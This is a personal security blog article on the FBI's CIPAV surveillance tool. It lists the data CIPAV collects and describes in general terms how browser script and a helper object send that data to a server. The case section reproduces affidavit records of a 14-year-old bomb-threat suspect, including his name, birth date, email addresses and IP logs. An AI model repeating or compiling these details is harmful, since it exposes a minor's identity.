• 1: Home
• 2: Presentations
  • 2.1: Hibernation File Attack
  • 2.2: Stoned Bootkit
  • 2.3: The Rise of MBR Rootkits & Bootkits in the Wild
  • 2.4: Stoned déjà vu - again
• 3: Trainings
  • 3.3: Hibernation File Attack - Reino de España
• 4: Articles
  • 4.1: Polymorphic Encryption Methods
  • 4.2: Writing a Boot Scan Engine
  • 4.3: The Magic of Bootkits
  • 4.4: Analysis of Sinowal
  • 4.5: Advanced Analysis of Sinowal
  • 4.6: Microsofts Rich Header
  • 4.7: Analysis of Conficker
  • 4.8: CIPAV
  • 4.9: Windows Exception Handling
  • 4.10: Pagefile Attack
  • 4.11: Software Watermarking
  • 4.12: Analysis of Stoned
  • 4.13: The Old New Thing About Development
  • 4.14: AntiWPA
  • 4.15: Kon-Boot
  • 4.16: Compiling Shellcode
  • 4.17: Elevated rights, process token and security identifier
  • 4.18: Abusing the TrueCrypt driver
  • 4.19: Nothing new: Msvcrt.dll
  • 4.21: Identifying Source Code
  • 4.22: Analysis of Mebratix
  • 4.23: Popsomp Hills
• 5: Projects
  • 5.1: DiskEdit
  • 5.2: Forensic Deletion Software
    • 5.2.1: Additional Deletion Methods
    • 5.2.2: Visual C++ Source Code
  • 5.3: Forensic Lockdown Software
  • 5.5: Information System
  • 5.6: QuickView
  • 5.7: Smart Boot Manager
  • 5.8: USB View
  • 5.9: Windows 3.1 Emulation
  • 5.10: Windows Boot System
  • 5.11: AV Tracker
  • 5.12: EIPTN
• 6: Services
  • 6.1: Boot-US work
  • 6.2: TeraByte Unlimited work
  • 6.3: EPIGUS work
• 8: Research
  • 8.1: Ascrimez Kit
  • 8.2: Analysing the PDF Exploit
  • 8.3: ZeuS
  • 8.4: infobox.ru: Botnet
  • 8.5: Operating System Development
  • 8.6: 4 million email addresses
• 9: About
  • 9.1: Links
  • 9.3: Peter Kleissner
  • 9.4: Last Modified Pages
  • 9.5: Meeting Points
  • 9.6: Live Search
  • 9.7: Terms of Use
  • 9.8: Contact

CIPAV (Computer and Internet Protocol Address Verifier)

Abstract

1984 is a tad later coming. Ah no nah it isn't. This was just a commentary in some random online news. I just want let you know what I know, about CIPAV. CIPAV stands for Computer and Internet Protocol Address Verifier, a software tool developed by the FBI. It has been described as "secret data-gathering tool that the FBI uses to track and gather location data on suspects under electronic surveillance". I want to cover CIPAV in my articles because I did some research about government investigation software. I want to explain what is known about CIPAV and how it most likely works. Enjoy reading!

- Peter Kleissner, Investigator

CIPAV

CIPAV (Computer and Internet Protocol Address Verifier) is a software program by the FBI to, getting it to a point, find out the IP address of a suspect using and faking electronic communication. This is necessary for the FBI to investigate electronical over U.S. frontiers and "useful" when someone uses proxies and tunneling to hide/anonymize its true origin in the internet.

As described in the affidavit (link below) CIPAV collects following data:

• IP address
• MAC address
• registry keys
• Environment Variables
• Open Ports
• Process List
• Operating System (Type, Version, Serial Number/Product ID)
• Internet Browser and Version
• Language identifier
• Computer Name, Company Name
• User Name
• visited sites history (of browser)

Half of the collected data can be used to identify a computer uniquely to a person - the other half is useful if you want to hack some target computer. IP, MAC, certain registry keys and computer name among others things can be used to assign a computer to a real person, but things like open ports, process list or internet browser are definitely used to find security flaws of the computers configuration.

In todays century you would use half of the information to find security flaws in the computers configuration and would use metasploit or other exploiting frameworks to gain access and control to the computer. The operating system product id has already been used multiple times to get the buyer of a computer - the whole process of selling a Windows OS will be logged via the product id (where it will be sold, shipped, to whom etc.). The history list of the web browser that is collected is clearly against privacy - and has nothing to do with configuration. It can be treated as content, not as meta-data/configuration and therefore its illegal to collect it without an explicit search warrant. The urls often contain sensitive information, like filled-out form contents, login information or session ids.

Timberlinebombinfo Case

Before explaining how CIPAV works, I want to give some details about the actual case where CIPAV was used to identify a suspect. In summer 2007, a student at Thurston County School send some bomb threats via email to his school. He also has (still) an account at MySpace, www.myspace.com/timberlinebombinfo, where he has a picture of bombs. His last login was 22.06.2007 - the end of the month where he sent multiple bomb threats to his school.

Anyway he used a proxy server in italy to hide his true ip address. He registered email accounts on Google and sent bomb threats to his school. He used a compromised computer in italy to tunnel his communication (most likely a SOCKS5 server), not a difficult thing to do. A lot of script-kiddie tools like shark trojan have integrated such functionality - a victim will automatically act as proxy. All you have to do is spread your trojan (a simple executable) into the world.

Google's Open

By giving information to the FBI. See following data that was collected by Google via Google Mail service of the suspect (taken from the affidavit):

Status: Enabled (user deleted account)
Services: Talk, Search History, Gmail
Name: Doug Briggs
Secondary Email:
Lang: en
IP: 80.76.80.103

LOGS: All Times are displayed in UTC/GMT
dougbriggs123@gmail.com
Date/Time                   IP
04-Jun-2007 05:47:29 am     81.27.207.243
04-Jun-2007 05:43:14 am     80.76.80.103
03-Jun-2007 06:19:44 am     80.76.80.103

This is what google saves about you, even you delete your Google Mail account. All IP addresses (the one which was used when registering and all others used for login) will be recorded.

MySpace too

MySpace stores following information:

User ID:         199219316
First Name:      Doug
Last Name:       Briggs
Gender:          Male
Date of Birth:   12/10/1992
Age:             14
Country:         US
City:            Lacey
Postal Code:     985003
Region:          Western Australia
Email Address:   timberline.sucks@gmail.com
User Name:       timberlinebombinfo
Sign up IP Address:   80.76.80.103
Sign up Date:    June 7, 2007 7:49 PM
Delete Date:     N/A
Login Date       June 7, 2007 7:49:32:247 PM  IP Address: 80.76.80.103

How CIPAV works

CIPAV is a framework of PHP, JavaScript and a Browser Helper Object/Active X code, much like todays non-public advertisment information capture tools. They (advertisment factories) put JavaScript or Flash on a site (banners you see etc.) to execute script code on a target machine. This script code gathers then local data, and sends to a server. This is exactly the same way how CIPAV works - a script in the web browser will be executed locally and local data send to a remote server. A browser helper object is used to gather a) additional and b) instantly data, like the registry values mentioned before or environment variables.

The idea is quite easy - code will be executed locally and the code comes within a website. This solves all problems with proxies for investigators - if you can see the website you have the malicious code. In the timberlinebombinfo case it was MySpace site and administrators who hosted CIPAV program on MySpace site to get above presented data. The final idea behind the concept is that the executed code will contact the (law enforcement) server and send the data like IP address and local configurations. The Browser Helper Object/Active X component can be installed automatically into the browser - so every time the suspect uses Internet Explorer the browser helper object will become active and can do its intelligence jobs.

So nope, there's no executable sent via email, this is simply not done, not true and not the case. (because many people speculated CIPAV could come via email or via security flaw in Windows)

References

• Affidavit for Search Warrant, United States District Court
• Search Warrant, United States District Court
• FBI remotely installs spyware to trace bomb threat
• FBI's Secret Spyware Tracks Down Teen Who Made Bomb Threats, Wired news